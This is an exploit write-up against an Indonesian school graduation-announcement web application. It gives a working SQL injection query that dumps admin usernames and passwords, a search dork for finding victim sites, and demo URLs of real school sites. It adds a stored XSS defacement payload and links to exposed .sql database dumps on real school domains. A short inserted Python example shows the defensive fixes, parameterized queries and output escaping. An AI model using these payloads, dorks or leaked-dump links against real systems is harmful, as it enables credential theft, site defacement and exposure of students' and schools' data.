#Exploit Title: Aplikasi Pengumuman Kelulusan – SQL-I, XSS, and Database Information Disclosure Vulnerability
#Date: 2020-09-09
#Exploit Author: Gh05t666nero
#Vendor Homepage: https://github.com/slametbsan
#Google Dork: intitle:Pengumuman.Kelulusan site:sch.id intext:Masukkan
#Category: webapps
#Tested On: Linux #1 SMP Debian 5.7.6-1kali2 (2020-07-01)
#Software Link: https://github.com/slametbsan/kelulusan/archive/kelulusan.zip
#############################################
[*] SQL Injection
#Query:
Gh05t666nero' or'1'=1 And/**/.0union/*%26*/distinctROW select (SELECT(@x)FROM(SELECT(@x:=0x00),(SELECT(@x)FROM(un_user)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x203a3a20,password,0x3c62723e))))x),2,3,4,5,6,(select group_concat(column_name,0x3c62723e,table_name) from information_schema.columns where table_schema=database()),8#
#Demo:
Demo 1: http://pengumuman.smkn1nabire.sch.id
Demo 2: http://smkn2bulik.sch.id/kelulusan
Demo 3: http://smkn2sampang.sch.id/kelulusan/19
#Proof of Concept:
Search with the dork provided above, then exploit the vulnerability using the Query listed above.
Copy the Query, paste it into the form in the middle of the page and submit it; the response automatically dumps the username|password values stored in the site's database.
#Login Page:
To reach the login page, just add the path /admin
#############################################
[*] Cross Site Scripting [STORED]
#Payload:
<br><h1 style="color:green; text-align:center;">Poisoned by Gh05t666nero</h1>
#Proof of concept:
Log in to the admin dashboard using the credentials obtained through the SQL injection described above, then open the Konfigurasi menu. Before entering the XSS Payload, click the Edit button.
After that, enter the XSS Payload in the Nama Sekolah form and click the save button; the Payload will be stored and executed.
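The SQL injection and the stored XSS described above are both fixed at the point where input meets an interpreter: bind the form value as a query parameter, and encode the stored Nama Sekolah value when it is written to the page. The following is an added example, not code from the application or from the exploit author; it uses Python with an in-memory SQLite table as a stand-in, and the table, column and function names are assumptions.

```python
import html
import sqlite3

# Constructed stand-in data: table, columns and rows are assumptions,
# not the application's real schema.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE siswa (no_ujian TEXT, nama TEXT, status TEXT)")
    db.executemany(
        "INSERT INTO siswa VALUES (?, ?, ?)",
        [("01-001", "Siti", "LULUS"), ("01-002", "Budi", "TIDAK LULUS")],
    )
    return db

def lookup_vulnerable(db, no_ujian):
    # Flaw class: form input concatenated into the SQL text, so a quote
    # in the input changes the structure of the query.
    sql = "SELECT nama, status FROM siswa WHERE no_ujian = '" + no_ujian + "'"
    return db.execute(sql).fetchall()

def lookup_safe(db, no_ujian):
    # Bound parameter: the driver passes the input as a value only.
    sql = "SELECT nama, status FROM siswa WHERE no_ujian = ?"
    return db.execute(sql, (no_ujian,)).fetchall()

def render_school_name(nama_sekolah):
    # Encode on output so stored markup is displayed as text, not parsed.
    return "<h2>" + html.escape(nama_sekolah, quote=True) + "</h2>"

# Constructed inputs for the demonstration.
TAUTOLOGY = "x' OR '1'='1"
MARKUP = '<h1 style="color:green;">test</h1>'

if __name__ == "__main__":
    db = make_db()
    print(len(lookup_vulnerable(db, TAUTOLOGY)))  # every row is returned
    print(lookup_safe(db, TAUTOLOGY))             # no row matches the literal string
    print(lookup_safe(db, "01-001"))              # normal lookup still works
    print(render_school_name(MARKUP))             # markup arrives as inert text
```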
#############################################
[*] Database Information Disclosure
#Example Bug:
http://www.mikrotik.smkn3garut.sch.id/un2016.sql
http://smkn2bulik.sch.id/kelulusan/un2016.sql
http://kelulusan.smkn1jati.sch.id/un2016.sql
#############################################
Contact Me:- gh05t666nero@gmail.com
Instagram:- @ojan_xploit
Telegram:- @Gh05t666nero1